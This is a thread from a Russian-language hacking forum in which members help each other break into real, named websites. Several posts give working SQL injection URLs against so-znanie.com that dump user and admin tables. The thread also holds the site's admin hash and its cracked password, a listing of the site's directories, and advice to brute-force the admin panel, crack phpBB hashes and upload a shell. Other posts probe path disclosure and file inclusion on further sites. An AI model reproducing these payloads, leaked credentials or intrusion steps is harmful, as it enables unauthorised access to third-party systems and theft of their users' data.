Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    так это ясно что раскрытие путей (не слепой)
    возможна скуль? я вот что спрашиваю!
     
    1 person likes this.
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Да все там норм, обыкновенная защита от ботов, тип поля как видно текстовый, максимум моно пути извлечь: /home/la2onix8/public_html/kernel/components/antiddos/anti_ddos.php
    От ддоса защищаются собаки))) О скуль инъекции речи нет...
     
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Конечно нет скули, если бы была хоть какая-то надежда (даже блинд), тут бы вывелась вторая страница: http://www.la2onix.ru/?act=news&page=3-1
     
  4. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Воу воу попредержите коней, на тип поля внимание обрати!!! Не вывелось бы...
     
  5. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Здрасте

    На сайте достал логин и пароль админа.Но не могу найти как зайти под админам . глянте пожалуиста

    so-znanie.com

    Login: Admin
    pw: soznanie
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...

    http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password)+from+phpbb_users++limit+1,1

    брути!
     
  7. dllerk

    dllerk New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    кароче нашел уязвимосьть на сайте такого содержания
    Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails.
    ссылка примерно такая: index.php?url=199000&ref=1
    Как её использовать ?
     
  8. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ну и в чем трабла то?
     
  9. dllerk

    dllerk New Member

    Joined:
    1 Apr 2009
    Messages:
    21
    Likes Received:
    0
    Reputations:
    0
    в этом вроде должно что то быть .. я незнаю , поэтому и спрашиваю
     
  10. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Дай полностью параметр подумаем...
     
  11. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос .

    ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_password+)+from+phpbb_users+LIMIT+1,1+--
     
  12. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    это MD5(phpBB3)
     
  13. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    я вот вроде нашел где php.ini
    но когда его инклудом подключить хочу то получаю это

    Parse error: syntax error, unexpected ',' in /usr/local/lib/php.ini on line 70

    не подскажете с чем связано ?
     
  14. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 z00MAN

    это чем то можно раскодировать ?
     
    #6334 Saiga, 4 Apr 2009
    Last edited: 4 Apr 2009
  15. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    http://www.insidepro.com/rus/passwordspro.shtml
     
  16. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Лишняя запятая.
     
  17. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Эм...

    Челу вроде как сайт нужен, а не форум... :rolleyes:

    Code:
    http://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a,id,login,password)+from+admins--+
    Code:
    1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
    И в расшифрованом виде:

    Code:
    1:admin:soznanie
    Так что правильный у него пасс...
     
    #6337 -m0rgan-, 4 Apr 2009
    Last edited: 4 Apr 2009
  18. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Code:
    1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
    И в расшифрованом виде:

    Code:
    1:admin:soznanie

    Если честно , я спрашивал как заити под админам
     
    #6338 Saiga, 4 Apr 2009
    Last edited: 4 Apr 2009
  19. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Мне кажется что админка там заныкана и находится по адресу типа /admin/blablabla.php и на папку /admin/ стоит запрет чтения...
    Воспользуйся брутером местоположения админки.
     
  20. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Code:
    error_log  - 403 Forbidden
    robots.txt - 200 OK
    test.htm - 200 OK
    test.php - 200 OK
    db/ - 200 OK
    stats/ - 200 OK
    config.php - 200 OK
    ini/ - 200 OK
    cpanel/ - 200 OK
    ~root/ - 403 Forbidden
    cgi-bin/ - 403 Forbidden
    img/ - 200 OK
    images/ - 200 OK
    forum/ - 200 OK
    article/ - 200 OK
    articles/ - 200 OK
    cgi-sys/ - 403 Forbidden
    css/ - 200 OK
    gallery/ - 200 OK
    js/ - 200 OK 
    чето хз где там админка, цпанель с sql на сайте никак не связана, а больше ниче не нашел...
    Так что брутьте пхпбб хэш и лейте шелл:)
     
Thread Status:
Not open for further replies.